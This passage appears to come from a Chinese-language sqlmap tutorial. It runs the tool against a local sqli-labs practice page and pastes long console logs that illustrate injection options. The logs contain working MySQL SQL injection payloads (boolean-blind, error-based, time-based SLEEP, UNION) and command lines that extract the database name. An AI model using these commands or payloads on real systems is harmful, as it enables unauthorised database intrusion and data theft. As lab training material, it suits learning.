[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:46:09 /2020-03-01/
[10:46:09] [INFO] loading tamper module 'space2comment'
[10:46:09] [INFO] testing connection to the target URL
[10:46:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:46:09] [INFO] testing if the target URL content is stable
[10:46:10] [INFO] target URL content is stable
[10:46:10] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:46:10] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:46:10] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:46:12] [WARNING] reflective value(s) found and filtering out
[10:46:12] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:46:12] [INFO] testing 'Generic inline queries'
[10:46:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[10:46:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[10:46:12] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[10:46:12] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[10:46:13] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[10:46:13] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[10:46:14] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)'
[10:46:14] [INFO] testing 'MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)'
[10:46:14] [INFO] testing 'MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)'
[10:46:14] [INFO] testing 'MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)'
[10:46:14] [INFO] testing 'MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (UPDATEXML)'
[10:46:14] [INFO] testing 'MySQL >= 4.1 error-based - ORDER BY, GROUP BY clause (FLOOR)'
[10:46:14] [INFO] testing 'MySQL inline queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:46:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:46:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT)'
[10:46:15] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[10:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[10:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - ORDER BY, GROUP BY clause'
[10:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - ORDER BY, GROUP BY clause (heavy query)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[10:46:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[10:46:16] [INFO] testing 'MySQL UNION query (random number) - 1 to 10 columns'
[10:46:16] [WARNING] GET parameter 'id' does not seem to be injectable
[10:46:16] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. As heuristic test turned out positive you are strongly advised to continue on with the tests
[*] ending @ 10:46:16 /2020-03-01/
6.Sqlmap设置DBMS认证
设置DBMS认证方式通过以下命令:
--dbms-cred = username:password
这个功能其实是一个鸡肋,如果已经知道数据库的用户名和密码,就不需要再进行探测了嘛,直接连接数据库就OK了。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --dbms-cred="root:root" --banner
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 10:55:37 /2020-03-01/
[10:55:37] [INFO] testing connection to the target URL
[10:55:37] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:55:37] [INFO] testing if the target URL content is stable
[10:55:38] [INFO] target URL content is stable
[10:55:38] [INFO] testing if GET parameter 'id' is dynamic
[10:55:38] [INFO] GET parameter 'id' appears to be dynamic
[10:55:38] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:55:38] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:55:38] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[10:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:55:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:55:40] [INFO] testing 'Generic inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[10:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[10:55:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[10:55:40] [INFO] testing 'MySQL inline queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[10:55:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[10:55:40] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[10:55:40] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:55:50] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:55:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:55:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:55:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:55:50] [INFO] target URL appears to have 3 columns in query
[10:55:50] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 9058=9058 AND ('dhTu'='dhTu
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 6167 FROM(SELECT COUNT(*),CONCAT(0x716a716a71,(SELECT (ELT(6167=6167,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('ETjb'='ETjb
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 4161 FROM (SELECT(SLEEP(5)))PeGx) AND ('WPLo'='WPLo
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2145') UNION ALL SELECT NULL,NULL,CONCAT(0x716a716a71,0x5758644165596a476969716e597763436e4c506652536466735754476a73534a6a6b7776486c6f45,0x716b6a6b71)-- -
---
[10:55:56] [INFO] the back-end DBMS is MySQL
[10:55:56] [INFO] fetching banner
[10:55:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
banner: '5.7.26'
[10:55:56] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 10:55:56 /2020-03-01/
五、sqlmap注入技术参数
1.sqlmap设置具体SQL注入技术
参数:
--technique
此参数用于指定检测注入时所用技术,默认情况下Sqlmap会使用自己支持的全部技术进行检测;
此参数后跟表示检测技术的大写字母,其值为B、E、U、S、T或Q,含义如下:
- B:Boolean-based blind(布尔型注入)
- E:Error-based(报错型注入)
- U:Union query-based(可联合查询注入)
- S:Stacked queries(可多语句查询注入)
- T:Time-based blind(基于时间延迟注入)
- Q:Inline queries(嵌套查询注入)
举例:
可以用–technique ES来指定使用两种检测技术;
–technique BEUSTQ与默认情况等效。
布尔型注入测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique B --current-db
打印
___
__H__
___ ___[']_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:01:28 /2020-03-01/
[11:01:28] [INFO] testing connection to the target URL
[11:01:29] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:01:29] [INFO] testing if the target URL content is stable
[11:01:29] [INFO] target URL content is stable
[11:01:29] [INFO] testing if GET parameter 'id' is dynamic
[11:01:29] [INFO] GET parameter 'id' appears to be dynamic
[11:01:29] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:01:29] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:01:29] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:01:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:01:35] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:01:35] [INFO] checking if the injection point on GET parameter 'id' is a false positive
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 17 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 7837=7837 AND ('Inoj'='Inoj
---
[11:01:38] [INFO] testing MySQL
[11:01:38] [INFO] confirming MySQL
[11:01:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:01:38] [INFO] fetching current database
[11:01:38] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[11:01:38] [INFO] retrieved: security
current database: 'security'
[11:01:39] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 11:01:39 /2020-03-01/
显然,此时的类型只有boolean-based blind。
2.sqlmap设置时间盲注延迟时间
参数:
–time-sec
用此参数设置基于时间延迟注入中延时时长,默认为5秒。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --current-db --time-sec 3
打印
___
__H__
___ ___[.]_____ ___ ___ {1.4.2.31#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:06:57 /2020-03-01/
[11:06:57] [INFO] testing connection to the target URL
[11:06:57] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:06:57] [INFO] testing if the target URL content is stable
[11:06:58] [INFO] target URL content is stable
[11:06:58] [INFO] testing if GET parameter 'id' is dynamic
[11:06:58] [INFO] GET parameter 'id' appears to be dynamic
[11:06:58] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:06:58] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:06:58] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[11:07:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:07:06] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[11:07:06] [INFO] testing 'Generic inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:07:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:07:06] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[11:07:06] [INFO] testing 'MySQL inline queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:07:06] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:07:06] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:07:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:07:13] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:07:13] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:07:13] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:07:13] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:07:13] [INFO] target URL appears to have 3 columns in query
[11:07:13] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 1324=1324 AND ('QGoK'='QGoK
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1') AND (SELECT 4928 FROM(SELECT COUNT(*),CONCAT(0x71707a6b71,(SELECT (ELT(4928=4928,1))),0x716a6a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('LiLq'='LiLq
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-2335') UNION ALL SELECT NULL,NULL,CONCAT(0x71707a6b71,0x6f74417665587859716869647543466d4c486e59584d504148467673707957736957435651565950,0x716a6a7071)-- -
---
[11:07:45] [INFO] the back-end DBMS is MySQL
[11:07:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.0
[11:07:45] [INFO] fetching current database
current database: 'security'
[11:07:45] [INFO] fetched data logged to text files under 'xxxx\sqlmap\output\127.0.0.1'
[*] ending @ 11:07:45 /2020-03-01/
其中有一段
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 9581 FROM (SELECT(SLEEP(3)))pIsh) AND ('YbSn'='YbSn
SELECT(SLEEP(3))即让select语句延迟3秒。
3.sqlmap设置union字段数
在进行联合查询注入时,Sqlmap会自动检测列数,范围是1到10;
当level值较高时列数检测范围的上限会扩大到50。
参数:
--union-cols
可以用此参数指定列数检测范围,如--union-cols 12-16就会让Sqlmap的列数检测范围变成12到16。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18
显示:
union-cols
4.sqlmap设置union字符
参数:
–union-char
默认情况下Sqlmap进行联合查询注入时使用空字符(NULL)。
但当level值较高时Sqlmap会生成随机数用于联合查询注入,因为有时使用空字符注入会失败而使用随机数会成功。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123
显示:
union-char
5.sqlmap设置union查询表
参数:
–union-from
有些情况下在联合查询中必须指定一个有效和可访问的表名,否则联合查询会执行失败。
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 --technique U --current-db -v 3 --union-cols 12-18 --level 3 --union-char 123 --union-from users
显示:
union-from
6.sqlmap识别指纹
探测目标指纹信息:
参数:
-f或者--fingerprint
参数的用法和作用和–banner类似。
进行测试:
python sqlmap.py -u http://127.0.0.1/sqli-labs/Less-3/?id=1 -f
打印
___
__H__
___ ___[)]_____ ___ ___ {1.4.2.31#dev}
|_ -| . [.] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 12:31:12 /2020-03-01/
[12:31:13] [INFO] testing connection to the target URL
[12:31:13] [INFO] testing if the target URL content is stable
[12:31:13] [INFO] target URL content is stable
[12:31:13] [INFO] testing if GET parameter 'id' is dynamic
[12:31:13] [INFO] GET parameter 'id' appears to be dynamic
[12:31:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:31:13] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:31:13] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[12:31:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:31:40] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[12:31:40] [INFO] testing 'Generic inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[12:31:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[12:31:40] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[12:31:40] [INFO] testing 'MySQL inline queries'
[12:31:40] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[12:31:40] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[12:31:41] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[12:31:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
